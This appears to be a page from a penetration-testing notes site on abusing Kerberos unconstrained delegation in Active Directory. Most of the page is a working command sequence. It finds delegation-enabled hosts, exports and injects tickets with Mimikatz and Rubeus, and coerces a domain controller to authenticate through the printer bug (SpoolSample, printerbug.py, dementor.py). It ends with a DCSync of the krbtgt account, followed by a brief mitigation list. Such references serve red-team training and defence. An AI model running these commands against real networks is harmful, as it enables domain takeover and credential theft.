GithubTwitter

Unconstrained Delegation

General

  • When set for service account, allows delegation to any service to any resource on the domain as a user

  • When enabled, DC places user's TGT inside TGS when user requests access to service with unconstrained delegation enabled

  • Server extracts TGT from TGS and stores it in LSASS

  • Server can reuse the user's TGT to access resoruces

  • Escalate privileges when extracting TGT from Domain Admins or other HVTs

  • Note: need local admin access on the machine to extract tickets

Exploitation

# Get computers that have unconstrained delegation enabled
# Using PowerView
Get-NetComputer -Unconstrained

# Using AD Module
Get-ADComputer -Filter { TrustedForDelegation -eq $true }
Get-ADUser -Filter { TrustedForDelegation -eq $true }

# ldapdomaindump
ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10   
grep TRUSTED_FOR_DELEGATION domain_computers.grep

# CrackMapExec
crackmapexec ldap 10.10.10.10 -u username -p password --trusted-for-delegation

# Monitor DA logins on computer
Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose

# Check if we have local admin access on that machine using PowerView
Find-LocalAdminAccess -ComputerName dcorp-appsrv

# Get session on machine as local admin and check for tickets
Invoke-Mimikatz -Command '"sekurlsa::tickets"'

# Export tickets
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

# Inject ticket into session
Invoke-Mimikatz -Command '"kerberos:ptt ticket.kirbi"'

Printer Bug

  • Trick HVT to connect to machine with Unconstrained Delegation enabled

  • Force Domain Admin to connect to specific machine

  • https://github.com/leechristensen/SpoolSample

# Start capturing for TGTs using Rubeus
.\Rubeus.exe monitor /interval:5 /nowrap

# Run MS-RPRN.exe
.\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appserv.dollarcorp.moneycorp.local

# From https://github.com/leechristensen/SpoolSample
.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME
.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB
# DC01.HACKER.LAB is the domain controller we want to compromise
# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control.

# From https://github.com/dirkjanm/krbrelayx
printerbug.py 'domain/username:password'@<VICTIM-DC-NAME> <UNCONSTRAINED-SERVER-DC-NAME>

# From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689
python dementor.py -d domain -u username -p password <UNCONSTRAINED-SERVER-DC-NAME> <VICTIM-DC-NAME>

# Copy base64 encoded TGT, remove extra spaces and inject it on attacker machine
.\Rubeus.exe ptt /ticket:ticket.kirbi

# Run DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Mitigation

  • Limit DA/Admin logins to specific servers

  • Set "Account is sensitive and cannot be delegated" for privileged accounts

Further Reading

PreviousConstrained DelegationNextDNS Admins

Last updated